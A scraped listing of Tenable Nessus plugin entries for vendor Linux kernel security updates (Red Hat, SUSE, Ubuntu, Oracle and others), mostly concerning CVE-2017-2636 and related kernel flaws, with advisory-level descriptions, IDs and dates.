    descriptionThis update for the Linux Kernel 3.12.60-52_57 fixes several issues. The following security bugs were fixed : - CVE-2017-7533: A bug in inotify code allowed local users to escalate privilege (bsc#1050751). - CVE-2017-7645: The NFSv2/NFSv3 server in the nfsd subsystem in the Linux kernel allowed remote attackers to cause a denial of service (system crash) via a long RPC reply, related to net/sunrpc/svc.c, fs/nfsd/nfs3xdr.c, and fs/nfsd/nfsxdr.c (bsc#1046191). - CVE-2017-2636: Race condition in drivers/tty/n_hdlc.c in the Linux kernel allowed local users to gain privileges or cause a denial of service (double free) by setting the HDLC line discipline (bsc#1027575). - CVE-2017-9242: The __ip6_append_data function in net/ipv6/ip6_output.c in the Linux kernel is too late in checking whether an overwrite of an skb data structure may occur, which allowed local users to cause a denial of service (system crash) via crafted system calls (bsc#1042892). Note that Tenable Network Security has extracted the preceding description block directly from the SUSE security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.
    last seen2020-06-01
    modified2020-06-02
    plugin id102317
    published2017-08-09
    reporterThis script is Copyright (C) 2017-2019 and is owned by Tenable, Inc. or an Affiliate thereof.
    sourcehttps://www.tenable.com/plugins/nessus/102317
    titleSUSE SLES12 Security Update : kernel (SUSE-SU-2017:2099-1)
  • NASL familySuSE Local Security Checks
    NASL idOPENSUSE-2017-418.NASL
    descriptionThe openSUSE Leap 42.2 kernel was updated to 4.4.56 fix various security issues and bugs. The following security bugs were fixed : - CVE-2017-7184: The xfrm_replay_verify_len function in net/xfrm/xfrm_user.c in the Linux kernel did not validate certain size data after an XFRM_MSG_NEWAE update, which allowed local users to obtain root privileges or cause a denial of service (heap-based out-of-bounds access) by leveraging the CAP_NET_ADMIN capability, as demonstrated during a Pwn2Own competition at CanSecWest 2017 for the Ubuntu 16.10 linux-image-* package 4.8.0.41.52 (bnc#1030573). - CVE-2016-10200: Race condition in the L2TPv3 IP Encapsulation feature in the Linux kernel allowed local users to gain privileges or cause a denial of service (use-after-free) by making multiple bind system calls without properly ascertaining whether a socket has the SOCK_ZAPPED status, related to net/l2tp/l2tp_ip.c and net/l2tp/l2tp_ip6.c (bnc#1028415). - CVE-2017-2636: Race condition in drivers/tty/n_hdlc.c in the Linux kernel allowed local users to gain privileges or cause a denial of service (double free) by setting the HDLC line discipline (bnc#1027565). - CVE-2017-6345: The LLC subsystem in the Linux kernel did not ensure that a certain destructor exists in required circumstances, which allowed local users to cause a denial of service (BUG_ON) or possibly have unspecified other impact via crafted system calls (bnc#1027190). - CVE-2017-6346: Race condition in net/packet/af_packet.c in the Linux kernel allowed local users to cause a denial of service (use-after-free) or possibly have unspecified other impact via a multithreaded application that made PACKET_FANOUT setsockopt system calls (bnc#1027189). - CVE-2017-6353: net/sctp/socket.c in the Linux kernel did not properly restrict association peel-off operations during certain wait states, which allowed local users to cause a denial of service (invalid unlock and double free) via a multithreaded application. NOTE: this vulnerability exists because of an incorrect fix for CVE-2017-5986 (bnc#1025235). - CVE-2017-6214: The tcp_splice_read function in net/ipv4/tcp.c in the Linux kernel allowed remote attackers to cause a denial of service (infinite loop and soft lockup) via vectors involving a TCP packet with the URG flag (bnc#1026722). - CVE-2016-2117: The atl2_probe function in drivers/net/ethernet/atheros/atlx/atl2.c in the Linux kernel incorrectly enables scatter/gather I/O, which allowed remote attackers to obtain sensitive information from kernel memory by reading packet data (bnc#968697). - CVE-2017-6347: The ip_cmsg_recv_checksum function in net/ipv4/ip_sockglue.c in the Linux kernel has incorrect expectations about skb data layout, which allowed local users to cause a denial of service (buffer over-read) or possibly have unspecified other impact via crafted system calls, as demonstrated by use of the MSG_MORE flag in conjunction with loopback UDP transmission (bnc#1027179). - CVE-2016-9191: The cgroup offline implementation in the Linux kernel mishandled certain drain operations, which allowed local users to cause a denial of service (system hang) by leveraging access to a container environment for executing a crafted application, as demonstrated by trinity (bnc#1008842). - CVE-2017-2596: The nested_vmx_check_vmptr function in arch/x86/kvm/vmx.c in the Linux kernel improperly emulates the VMXON instruction, which allowed KVM L1 guest OS users to cause a denial of service (host OS memory consumption) by leveraging the mishandling of page references (bnc#1022785). The following non-security bugs were fixed : - ACPI: Do not create a platform_device for IOAPIC/IOxAPIC (bsc#1028819). - ACPI, ioapic: Clear on-stack resource before using it (bsc#1028819). - ACPI: Remove platform devices from a bus on removal (bsc#1028819). - add mainline tag to one hyperv patch - bnx2x: allow adding VLANs while interface is down (bsc#1027273). - btrfs: backref: Fix soft lockup in __merge_refs function (bsc#1017641). - btrfs: incremental send, do not delay rename when parent inode is new (bsc#1028325). - btrfs: incremental send, do not issue invalid rmdir operations (bsc#1028325). - btrfs: qgroup: Move half of the qgroup accounting time out of commit trans (bsc#1017461). - btrfs: send, fix failure to rename top level inode due to name collision (bsc#1028325). - btrfs: serialize subvolume mounts with potentially mismatching rw flags (bsc#951844 bsc#1024015) - crypto: algif_hash - avoid zero-sized array (bnc#1007962). - cxgb4vf: do not offload Rx checksums for IPv6 fragments (bsc#1026692). - drivers: hv: vmbus: Prevent sending data on a rescinded channel (fate#320485, bug#1028217). - drm/i915: Add intel_uncore_suspend / resume functions (bsc#1011913). - drm/i915: Listen for PMIC bus access notifications (bsc#1011913). - drm/mgag200: Added support for the new device G200eH3 (bsc#1007959, fate#322780) - ext4: fix fencepost in s_first_meta_bg validation (bsc#1029986). - Fix kABI breakage of dccp in 4.4.56 (stable-4.4.56). - futex: Add missing error handling to FUTEX_REQUEUE_PI (bsc#969755). - futex: Fix potential use-after-free in FUTEX_REQUEUE_PI (bsc#969755). - i2c: designware-baytrail: Acquire P-Unit access on bus acquire (bsc#1011913). - i2c: designware-baytrail: Call pmic_bus_access_notifier_chain (bsc#1011913). - i2c: designware-baytrail: Fix race when resetting the semaphore (bsc#1011913). - i2c: designware-baytrail: Only check iosf_mbi_available() for shared hosts (bsc#1011913). - i2c: designware: Disable pm for PMIC i2c-bus even if there is no _SEM method (bsc#1011913). - i2c-designware: increase timeout (bsc#1011913). - i2c: designware: Never suspend i2c-busses used for accessing the system PMIC (bsc#1011913). - i2c: designware: Rename accessor_flags to flags (bsc#1011913). - kABI: protect struct iscsi_conn (kabi). - kABI: protect struct se_node_acl (kabi). - kABI: restore can_rx_register parameters (kabi). - kgr/module: make a taint flag module-specific (fate#313296). - kgr: remove all arch-specific kgraft header files (fate#313296). - l2tp: fix address test in __l2tp_ip6_bind_lookup() (bsc#1028415). - l2tp: fix lookup for sockets not bound to a device in l2tp_ip (bsc#1028415). - l2tp: fix racy socket lookup in l2tp_ip and l2tp_ip6 bind() (bsc#1028415). - l2tp: hold socket before dropping lock in l2tp_ip(, 6)_recv() (bsc#1028415). - l2tp: lock socket before checking flags in connect() (bsc#1028415). - md/raid1: add rcu protection to rdev in fix_read_error (References: bsc#998106,bsc#1020048,bsc#982783). - md/raid1: fix a use-after-free bug (bsc#998106,bsc#1020048,bsc#982783). - md/raid1: handle flush request correctly (bsc#998106,bsc#1020048,bsc#982783). - md/raid1: Refactor raid1_make_request (bsc#998106,bsc#1020048,bsc#982783). - mm: fix set pageblock migratetype in deferred struct page init (bnc#1027195). - mm/page_alloc: Remove useless parameter of __free_pages_boot_core (bnc#1027195). - module: move add_taint_module() to a header file (fate#313296). - net/ena: change condition for host attribute configuration (bsc#1026509). - net/ena: change driver
    last seen2020-06-05
    modified2017-04-03
    plugin id99156
    published2017-04-03
    reporterThis script is Copyright (C) 2017-2020 and is owned by Tenable, Inc. or an Affiliate thereof.
    sourcehttps://www.tenable.com/plugins/nessus/99156
    titleopenSUSE Security Update : the Linux Kernel (openSUSE-2017-418)
  • NASL familyScientific Linux Local Security Checks
    NASL idSL_20170412_KERNEL_ON_SL7_X.NASL
    descriptionSecurity Fix(es) : - A race condition flaw was found in the N_HLDC Linux kernel driver when accessing n_hdlc.tbuf list that can lead to double free. A local, unprivileged user able to set the HDLC line discipline on the tty device could use this flaw to increase their privileges on the system. (CVE-2017-2636, Important) - A flaw was found in the Linux kernel key management subsystem in which a local attacker could crash the kernel or corrupt the stack and additional memory (denial of service) by supplying a specially crafted RSA key. This flaw panics the machine during the verification of the RSA key. (CVE-2016-8650, Moderate) - A flaw was found in the Linux kernel
    last seen2020-03-18
    modified2017-04-13
    plugin id99351
    published2017-04-13
    reporterThis script is Copyright (C) 2017-2020 and is owned by Tenable, Inc. or an Affiliate thereof.
    sourcehttps://www.tenable.com/plugins/nessus/99351
    titleScientific Linux Security Update : kernel on SL7.x x86_64 (20170412)
  • NASL familyOracle Linux Local Security Checks
    NASL idORACLELINUX_ELSA-2017-1842-1.NASL
    descriptionThe remote Oracle Linux host is missing a security update for the kernel package(s).
    last seen2020-06-01
    modified2020-06-02
    plugin id102511
    published2017-08-16
    reporterThis script is Copyright (C) 2017-2018 Tenable Network Security, Inc.
    sourcehttps://www.tenable.com/plugins/nessus/102511
    titleOracle Linux 7 : kernel (ELSA-2017-1842-1) (Stack Clash)
  • NASL familyUbuntu Local Security Checks
    NASL idUBUNTU_USN-3221-1.NASL
    descriptionAlexander Popov discovered that the N_HDLC line discipline implementation in the Linux kernel contained a double-free vulnerability. A local attacker could use this to cause a denial of service (system crash) or possibly gain administrative privileges. Note that Tenable Network Security has extracted the preceding description block directly from the Ubuntu security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.
    last seen2020-06-01
    modified2020-06-02
    plugin id97607
    published2017-03-08
    reporterUbuntu Security Notice (C) 2017-2019 Canonical, Inc. / NASL script (C) 2017-2019 and is owned by Tenable, Inc. or an Affiliate thereof.
    sourcehttps://www.tenable.com/plugins/nessus/97607
    titleUbuntu 16.10 : linux, linux-raspi2 vulnerability (USN-3221-1)
  • NASL familyOracleVM Local Security Checks
    NASL idORACLEVM_OVMSA-2017-0145.NASL
    descriptionThe remote OracleVM system is missing necessary patches to address critical security updates : please see Oracle VM Security Advisory OVMSA-2017-0145 for details.
    last seen2020-06-01
    modified2020-06-02
    plugin id102774
    published2017-08-25
    reporterThis script is Copyright (C) 2017-2019 and is owned by Tenable, Inc. or an Affiliate thereof.
    sourcehttps://www.tenable.com/plugins/nessus/102774
    titleOracleVM 3.4 : Unbreakable / etc (OVMSA-2017-0145) (Stack Clash)
  • NASL familyF5 Networks Local Security Checks
    NASL idF5_BIGIP_SOL18015201.NASL
    descriptionRace condition in drivers/tty/n_hdlc.c in the Linux kernel through 4.10.1 allows local users to gain privileges or cause a denial of service (double free) by setting the HDLC line discipline. (CVE-2017-2636)
    last seen2020-06-01
    modified2020-06-02
    plugin id99048
    published2017-03-30
    reporterThis script is Copyright (C) 2017-2019 and is owned by Tenable, Inc. or an Affiliate thereof.
    sourcehttps://www.tenable.com/plugins/nessus/99048
    titleF5 Networks BIG-IP : Linux kernel vulnerability (K18015201)
  • NASL familyOracle Linux Local Security Checks
    NASL idORACLELINUX_ELSA-2017-0892.NASL
    descriptionFrom Red Hat Security Advisory 2017:0892 : An update for kernel is now available for Red Hat Enterprise Linux 6. Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section. The kernel packages contain the Linux kernel, the core of any Linux operating system. Security Fix(es) : * A race condition flaw was found in the N_HLDC Linux kernel driver when accessing n_hdlc.tbuf list that can lead to double free. A local, unprivileged user able to set the HDLC line discipline on the tty device could use this flaw to increase their privileges on the system. (CVE-2017-2636, Important) * A flaw was found in the Linux kernel
    last seen2020-06-01
    modified2020-06-02
    plugin id99298
    published2017-04-12
    reporterThis script is Copyright (C) 2017-2019 and is owned by Tenable, Inc. or an Affiliate thereof.
    sourcehttps://www.tenable.com/plugins/nessus/99298
    titleOracle Linux 6 : kernel (ELSA-2017-0892)
  • NASL familyRed Hat Local Security Checks
    NASL idREDHAT-RHSA-2017-1232.NASL
    descriptionAn update for kernel is now available for Red Hat Enterprise Linux 6.5 Advanced Update Support and Red Hat Enterprise Linux 6.5 Telco Extended Update Support. Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section. The kernel packages contain the Linux kernel, the core of any Linux operating system. Security Fix(es) : * A race condition flaw was found in the N_HLDC Linux kernel driver when accessing n_hdlc.tbuf list that can lead to double free. A local, unprivileged user able to set the HDLC line discipline on the tty device could use this flaw to increase their privileges on the system. (CVE-2017-2636, Important) Red Hat would like to thank Alexander Popov for reporting this issue.
    last seen2020-06-01
    modified2020-06-02
    plugin id100239
    published2017-05-17
    reporterThis script is Copyright (C) 2017-2019 and is owned by Tenable, Inc. or an Affiliate thereof.
    sourcehttps://www.tenable.com/plugins/nessus/100239
    titleRHEL 6 : kernel (RHSA-2017:1232)
  • NASL familySuSE Local Security Checks
    NASL idSUSE_SU-2017-2073-1.NASL
    descriptionThis update for the Linux Kernel 3.12.67-60_64_24 fixes several issues. The following security bugs were fixed : - CVE-2017-7533: A bug in inotify code allowed local users to escalate privilege (bsc#1050751). - CVE-2017-7645: The NFSv2/NFSv3 server in the nfsd subsystem in the Linux kernel allowed remote attackers to cause a denial of service (system crash) via a long RPC reply, related to net/sunrpc/svc.c, fs/nfsd/nfs3xdr.c, and fs/nfsd/nfsxdr.c (bsc#1046191). - CVE-2017-2636: Race condition in drivers/tty/n_hdlc.c in the Linux kernel allowed local users to gain privileges or cause a denial of service (double free) by setting the HDLC line discipline (bsc#1027575). - CVE-2017-9242: The __ip6_append_data function in net/ipv6/ip6_output.c in the Linux kernel is too late in checking whether an overwrite of an skb data structure may occur, which allowed local users to cause a denial of service (system crash) via crafted system calls (bsc#1042892). - CVE-2017-8890: The inet_csk_clone_lock function in net/ipv4/inet_connection_sock.c in the Linux kernel allowed attackers to cause a denial of service (double free) or possibly have unspecified other impact by leveraging use of the accept system call (bsc#1038564). Note that Tenable Network Security has extracted the preceding description block directly from the SUSE security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.
    last seen2020-06-01
    modified2020-06-02
    plugin id102254
    published2017-08-08
    reporterThis script is Copyright (C) 2017-2019 and is owned by Tenable, Inc. or an Affiliate thereof.
    sourcehttps://www.tenable.com/plugins/nessus/102254
    titleSUSE SLES12 Security Update : kernel (SUSE-SU-2017:2073-1)
  • NASL familyUbuntu Local Security Checks
    NASL idUBUNTU_USN-3220-1.NASL
    descriptionAlexander Popov discovered that the N_HDLC line discipline implementation in the Linux kernel contained a double-free vulnerability. A local attacker could use this to cause a denial of service (system crash) or possibly gain administrative privileges. Note that Tenable Network Security has extracted the preceding description block directly from the Ubuntu security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.
    last seen2020-06-01
    modified2020-06-02
    plugin id97605
    published2017-03-08
    reporterUbuntu Security Notice (C) 2017-2019 Canonical, Inc. / NASL script (C) 2017-2019 and is owned by Tenable, Inc. or an Affiliate thereof.
    sourcehttps://www.tenable.com/plugins/nessus/97605
    titleUbuntu 16.04 LTS : linux, linux-gke, linux-raspi2, linux-snapdragon vulnerability (USN-3220-1)
  • NASL familyUbuntu Local Security Checks
    NASL idUBUNTU_USN-3221-2.NASL
    descriptionUSN-3221-1 fixed vulnerabilities in the Linux kernel for Ubuntu 16.10. This update provides the corresponding updates for the Linux Hardware Enablement (HWE) kernel from Ubuntu 16.10 for Ubuntu 16.04 LTS. Alexander Popov discovered that the N_HDLC line discipline implementation in the Linux kernel contained a double-free vulnerability. A local attacker could use this to cause a denial of service (system crash) or possibly gain administrative privileges. (CVE-2017-2636). Note that Tenable Network Security has extracted the preceding description block directly from the Ubuntu security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.
    last seen2020-06-01
    modified2020-06-02
    plugin id97608
    published2017-03-08
    reporterUbuntu Security Notice (C) 2017-2019 Canonical, Inc. / NASL script (C) 2017-2019 and is owned by Tenable, Inc. or an Affiliate thereof.
    sourcehttps://www.tenable.com/plugins/nessus/97608
    titleUbuntu 16.04 LTS : linux-hwe vulnerability (USN-3221-2)
  • NASL familyRed Hat Local Security Checks
    NASL idREDHAT-RHSA-2017-1126.NASL
    descriptionAn update for kernel is now available for Red Hat Enterprise Linux 6.2 Advanced Update Support. Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section. The kernel packages contain the Linux kernel, the core of any Linux operating system. Security Fix(es) : * A race condition flaw was found in the N_HLDC Linux kernel driver when accessing n_hdlc.tbuf list that can lead to double free. A local, unprivileged user able to set the HDLC line discipline on the tty device could use this flaw to increase their privileges on the system. (CVE-2017-2636, Important) Red Hat would like to thank Alexander Popov for reporting this issue.
    last seen2020-06-01
    modified2020-06-02
    plugin id99684
    published2017-04-26
    reporterThis script is Copyright (C) 2017-2019 and is owned by Tenable, Inc. or an Affiliate thereof.
    sourcehttps://www.tenable.com/plugins/nessus/99684
    titleRHEL 6 : kernel (RHSA-2017:1126)
  • NASL familyVirtuozzo Local Security Checks
    NASL idVIRTUOZZO_VZA-2017-028.NASL
    descriptionAccording to the version of the vzkernel package and the readykernel-patch installed, the Virtuozzo installation on the remote host is affected by the following vulnerabilities : - Race condition in drivers/tty/n_hdlc.c in the Linux kernel through 4.10.1 allows local users to gain privileges or cause a denial of service (double free) by setting the HDLC line discipline. - Kernel crash in cgroup_show_path() while running rkt in a container. Note that Tenable Network Security has extracted the preceding description block directly from the Virtuozzo security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.
    last seen2020-06-01
    modified2020-06-02
    plugin id99315
    published2017-04-13
    reporterThis script is Copyright (C) 2017-2019 and is owned by Tenable, Inc. or an Affiliate thereof.
    sourcehttps://www.tenable.com/plugins/nessus/99315
    titleVirtuozzo 7 : readykernel-patch (VZA-2017-028)
  • NASL familyOracleVM Local Security Checks
    NASL idORACLEVM_OVMSA-2017-0058.NASL
    descriptionThe remote OracleVM system is missing necessary patches to address critical security updates : - RHEL: complement upstream workaround for CVE-2016-10142. (Quentin Casasnovas) [Orabug: 25765786] (CVE-2016-10142) (CVE-2016-10142) - net: ping: check minimum size on ICMP header length (Kees Cook) [Orabug: 25766914] (CVE-2016-8399) - ipv6: stop sending PTB packets for MTU < 1280 (Hagen Paul Pfeifer) [Orabug: 25765786] (CVE-2016-10142) - sg_write/bsg_write is not fit to be called under KERNEL_DS (Al Viro) [Orabug: 25765448] (CVE-2016-10088) - scsi: sg: check length passed to SG_NEXT_CMD_LEN (peter chang) [Orabug: 25752011] (CVE-2017-7187) - tty: n_hdlc: get rid of racy n_hdlc.tbuf (Alexander Popov) [Orabug: 25696689] (CVE-2017-2636) - TTY: n_hdlc, fix lockdep false positive (Jiri Slaby) [Orabug: 25696689] (CVE-2017-2636) - drivers/tty/n_hdlc.c: replace kmalloc/memset by kzalloc (Fabian Frederick) [Orabug: 25696689] (CVE-2017-2636) - list: introduce list_first_entry_or_null (Jiri Pirko) [Orabug: 25696689] (CVE-2017-2636) - firewire: net: guard against rx buffer overflows (Stefan Richter) [Orabug: 25451538] (CVE-2016-8633) - x86/mm/32: Enable full randomization on i386 and X86_32 (Hector Marco-Gisbert) [Orabug: 25463929] (CVE-2016-3672) - x86 get_unmapped_area: Access mmap_legacy_base through mm_struct member (Radu Caragea) [Orabug: 25463929] (CVE-2016-3672) - sg_start_req: make sure that there
    last seen2020-06-01
    modified2020-06-02
    plugin id99164
    published2017-04-03
    reporterThis script is Copyright (C) 2017-2019 and is owned by Tenable, Inc. or an Affiliate thereof.
    sourcehttps://www.tenable.com/plugins/nessus/99164
    titleOracleVM 3.2 : Unbreakable / etc (OVMSA-2017-0058)
  • NASL familyRed Hat Local Security Checks
    NASL idREDHAT-RHSA-2017-1125.NASL
    descriptionAn update for kernel is now available for Red Hat Enterprise Linux 7.2 Extended Update Support. Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section. The kernel packages contain the Linux kernel, the core of any Linux operating system. Security Fix(es) : * A race condition flaw was found in the N_HLDC Linux kernel driver when accessing n_hdlc.tbuf list that can lead to double free. A local, unprivileged user able to set the HDLC line discipline on the tty device could use this flaw to increase their privileges on the system. (CVE-2017-2636, Important) Red Hat would like to thank Alexander Popov for reporting this issue. Bug Fix(es) : * Previously, memory allocation in the libceph kernel module did not work correctly. Consequently, the file system on a RADOS Block Device(RBD) could become unresponsive in the situations under high memory pressure. With this update, the underlying source code has been fixed, and the file system no longer hangs in the described scenario. (BZ#1418314) * Previously, the mpt3sas driver incorrectly checked the Transport Layer Retries (TLR) state even on Redundant Array Of Independent Discs (RAID) devices. Consequently, a kernel panic occurred when mpt3sas attempted to read from the RAID devices. With this update, mpt3sas has been fixed to check the TLR state only for non-RAID devices, and the kernel no longer panics under the described circumstances. (BZ#1427453)
    last seen2020-06-01
    modified2020-06-02
    plugin id99683
    published2017-04-26
    reporterThis script is Copyright (C) 2017-2019 and is owned by Tenable, Inc. or an Affiliate thereof.
    sourcehttps://www.tenable.com/plugins/nessus/99683
    titleRHEL 7 : kernel (RHSA-2017:1125)
  • NASL familyOracleVM Local Security Checks
    NASL idORACLEVM_OVMSA-2017-0057.NASL
    descriptionThe remote OracleVM system is missing necessary patches to address critical security updates : please see Oracle VM Security Advisory OVMSA-2017-0057 for details.
    last seen2020-06-01
    modified2020-06-02
    plugin id99163
    published2017-04-03
    reporterThis script is Copyright (C) 2017-2019 and is owned by Tenable, Inc. or an Affiliate thereof.
    sourcehttps://www.tenable.com/plugins/nessus/99163
    titleOracleVM 3.3 : Unbreakable / etc (OVMSA-2017-0057) (Dirty COW)
  • NASL familyNewStart CGSL Local Security Checks
    NASL idNEWSTART_CGSL_NS-SA-2019-0099_KERNEL.NASL
    descriptionThe remote NewStart CGSL host, running version MAIN 4.05, has kernel packages installed that are affected by multiple vulnerabilities: - A flaw was found in the way memory was being allocated on the stack for user space binaries. If heap (or different memory region) and stack memory regions were adjacent to each other, an attacker could use this flaw to jump over the stack guard gap, cause controlled memory corruption on process stack or the adjacent memory region, and thus increase their privileges on the system. This is a kernel-side mitigation which increases the stack guard gap size from one page to 1 MiB to make successful exploitation of this issue more difficult. (CVE-2017-1000364) - A flaw was found in the way memory was being allocated on the stack for user space binaries. If heap (or different memory region) and stack memory regions were adjacent to each other, an attacker could use this flaw to jump over the stack guard gap, cause controlled memory corruption on process stack or the adjacent memory region, and thus increase their privileges on the system. This is glibc-side mitigation which blocks processing of LD_LIBRARY_PATH for programs running in secure-execution mode and reduces the number of allocations performed by the processing of LD_AUDIT, LD_PRELOAD, and LD_HWCAP_MASK, making successful exploitation of this issue more difficult. (CVE-2017-1000366) - A race condition flaw was found in the N_HLDC Linux kernel driver when accessing n_hdlc.tbuf list that can lead to double free. A local, unprivileged user able to set the HDLC line discipline on the tty device could use this flaw to increase their privileges on the system. (CVE-2017-2636) - The NFS2/3 RPC client could send long arguments to the NFS server. These encoded arguments are stored in an array of memory pages, and accessed using pointer variables. Arbitrarily long arguments could make these pointers point outside the array and cause an out-of- bounds memory access. A remote user or program could use this flaw to crash the kernel, resulting in denial of service. (CVE-2017-7645) - The NFSv2 and NFSv3 server implementations in the Linux kernel through 4.10.13 lacked certain checks for the end of a buffer. A remote attacker could trigger a pointer- arithmetic error or possibly cause other unspecified impacts using crafted requests related to fs/nfsd/nfs3xdr.c and fs/nfsd/nfsxdr.c. (CVE-2017-7895) Note that Nessus has not tested for this issue but has instead relied only on the application
    last seen2020-06-01
    modified2020-06-02
    plugin id127325
    published2019-08-12
    reporterThis script is Copyright (C) 2019 and is owned by Tenable, Inc. or an Affiliate thereof.
    sourcehttps://www.tenable.com/plugins/nessus/127325
    titleNewStart CGSL MAIN 4.05 : kernel Multiple Vulnerabilities (NS-SA-2019-0099)
  • NASL familySuSE Local Security Checks
    NASL idSUSE_SU-2017-2093-1.NASL
    descriptionThis update for the Linux Kernel 3.12.60-52_60 fixes several issues. The following security bugs were fixed : - CVE-2017-7533: A bug in inotify code allowed local users to escalate privilege (bsc#1050751). - CVE-2017-7645: The NFSv2/NFSv3 server in the nfsd subsystem in the Linux kernel allowed remote attackers to cause a denial of service (system crash) via a long RPC reply, related to net/sunrpc/svc.c, fs/nfsd/nfs3xdr.c, and fs/nfsd/nfsxdr.c (bsc#1046191). - CVE-2017-2636: Race condition in drivers/tty/n_hdlc.c in the Linux kernel allowed local users to gain privileges or cause a denial of service (double free) by setting the HDLC line discipline (bsc#1027575). - CVE-2017-9242: The __ip6_append_data function in net/ipv6/ip6_output.c in the Linux kernel is too late in checking whether an overwrite of an skb data structure may occur, which allowed local users to cause a denial of service (system crash) via crafted system calls (bsc#1042892). Note that Tenable Network Security has extracted the preceding description block directly from the SUSE security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.
    last seen2020-06-01
    modified2020-06-02
    plugin id102312
    published2017-08-09
    reporterThis script is Copyright (C) 2017-2019 and is owned by Tenable, Inc. or an Affiliate thereof.
    sourcehttps://www.tenable.com/plugins/nessus/102312
    titleSUSE SLES12 Security Update : kernel (SUSE-SU-2017:2093-1)
  • NASL familyUbuntu Local Security Checks
    NASL idUBUNTU_USN-3218-1.NASL
    descriptionAlexander Popov discovered that the N_HDLC line discipline implementation in the Linux kernel contained a double-free vulnerability. A local attacker could use this to cause a denial of service (system crash) or possibly gain administrative privileges. Note that Tenable Network Security has extracted the preceding description block directly from the Ubuntu security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.
    last seen2020-06-01
    modified2020-06-02
    plugin id97602
    published2017-03-08
    reporterUbuntu Security Notice (C) 2017-2019 Canonical, Inc. / NASL script (C) 2017-2019 and is owned by Tenable, Inc. or an Affiliate thereof.
    sourcehttps://www.tenable.com/plugins/nessus/97602
    titleUbuntu 12.04 LTS : linux, linux-ti-omap4 vulnerability (USN-3218-1)
  • NASL familyRed Hat Local Security Checks
    NASL idREDHAT-RHSA-2017-0892.NASL
    descriptionAn update for kernel is now available for Red Hat Enterprise Linux 6. Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section. The kernel packages contain the Linux kernel, the core of any Linux operating system. Security Fix(es) : * A race condition flaw was found in the N_HLDC Linux kernel driver when accessing n_hdlc.tbuf list that can lead to double free. A local, unprivileged user able to set the HDLC line discipline on the tty device could use this flaw to increase their privileges on the system. (CVE-2017-2636, Important) * A flaw was found in the Linux kernel
    last seen2020-06-01
    modified2020-06-02
    plugin id99338
    published2017-04-13
    reporterThis script is Copyright (C) 2017-2019 and is owned by Tenable, Inc. or an Affiliate thereof.
    sourcehttps://www.tenable.com/plugins/nessus/99338
    titleRHEL 6 : kernel (RHSA-2017:0892)
  • NASL familyRed Hat Local Security Checks
    NASL idREDHAT-RHSA-2017-0931.NASL
    descriptionAn update for kernel-rt is now available for Red Hat Enterprise Linux 7. Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section. The kernel-rt packages provide the Real Time Linux Kernel, which enables fine-tuning for systems with extremely high determinism requirements. Security Fix(es) : * A race condition flaw was found in the N_HLDC Linux kernel driver when accessing n_hdlc.tbuf list that can lead to double free. A local, unprivileged user able to set the HDLC line discipline on the tty device could use this flaw to increase their privileges on the system. (CVE-2017-2636, Important) * A flaw was found in the Linux kernel key management subsystem in which a local attacker could crash the kernel or corrupt the stack and additional memory (denial of service) by supplying a specially crafted RSA key. This flaw panics the machine during the verification of the RSA key. (CVE-2016-8650, Moderate) * A flaw was found in the Linux kernel
    last seen2020-06-01
    modified2020-06-02
    plugin id99344
    published2017-04-13
    reporterThis script is Copyright (C) 2017-2019 and is owned by Tenable, Inc. or an Affiliate thereof.
    sourcehttps://www.tenable.com/plugins/nessus/99344
    titleRHEL 7 : kernel-rt (RHSA-2017:0931)
  • NASL familyRed Hat Local Security Checks
    NASL idREDHAT-RHSA-2017-0986.NASL
    descriptionAn update for kernel is now available for Red Hat Enterprise Linux 6.4 Advanced Update Support. Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section. The kernel packages contain the Linux kernel, the core of any Linux operating system. Security Fix(es) : * A race condition flaw was found in the N_HLDC Linux kernel driver when accessing n_hdlc.tbuf list that can lead to double free. A local, unprivileged user able to set the HDLC line discipline on the tty device could use this flaw to increase their privileges on the system. (CVE-2017-2636, Important) Red Hat would like to thank Alexander Popov for reporting this issue.
    last seen2020-06-01
    modified2020-06-02
    plugin id99453
    published2017-04-19
    reporterThis script is Copyright (C) 2017-2019 and is owned by Tenable, Inc. or an Affiliate thereof.
    sourcehttps://www.tenable.com/plugins/nessus/99453
    titleRHEL 6 : kernel (RHSA-2017:0986)
  • NASL familyOracle Linux Local Security Checks
    NASL idORACLELINUX_ELSA-2017-3535.NASL
